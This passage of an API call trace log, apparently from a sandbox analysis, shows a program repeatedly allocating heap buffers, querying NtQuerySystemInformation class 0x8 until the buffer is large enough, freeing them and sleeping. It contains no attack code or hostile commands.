hHeap=0x2560000) returned 1 [0265.337] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0265.337] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.339] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0265.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0265.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.339] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0265.339] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0265.339] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0265.340] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.343] Sleep (dwMilliseconds=0x110) [0265.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0265.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0265.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0265.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0265.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0265.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0265.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0265.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0265.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.491] Sleep (dwMilliseconds=0x110) [0265.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0265.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0265.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0265.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0265.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0265.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0265.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0265.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0265.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.537] Sleep (dwMilliseconds=0x110) [0265.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0265.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0265.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0265.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0265.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0265.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0265.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0265.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0265.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.611] Sleep (dwMilliseconds=0x110) [0265.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0265.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0265.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0265.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0265.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0265.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0265.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0265.912] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0265.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.914] Sleep (dwMilliseconds=0x110) [0265.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0265.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0265.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0265.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0265.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0265.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0265.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0265.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0265.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.926] Sleep (dwMilliseconds=0x110) [0265.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0265.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0265.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0265.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0265.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0265.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0265.949] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0265.949] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0265.949] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0265.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0265.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0265.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0265.953] Sleep (dwMilliseconds=0x110) [0266.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0266.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0266.025] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0266.025] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0266.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0266.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0266.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0266.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0266.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.034] Sleep (dwMilliseconds=0x110) [0266.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0266.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0266.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0266.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0266.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0266.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0266.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0266.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0266.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.053] Sleep (dwMilliseconds=0x110) [0266.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0266.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0266.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0266.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0266.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0266.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0266.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0266.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0266.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.067] Sleep (dwMilliseconds=0x110) [0266.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0266.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0266.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0266.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0266.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0266.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0266.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0266.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0266.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.100] Sleep (dwMilliseconds=0x110) [0266.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0266.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0266.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0266.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0266.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0266.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0266.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0266.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0266.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.146] Sleep (dwMilliseconds=0x110) [0266.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0266.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0266.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0266.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0266.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0266.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0266.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0266.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0266.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.194] Sleep (dwMilliseconds=0x110) [0266.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0266.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0266.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0266.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0266.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0266.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0266.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0266.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0266.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.221] Sleep (dwMilliseconds=0x110) [0266.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0266.321] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, 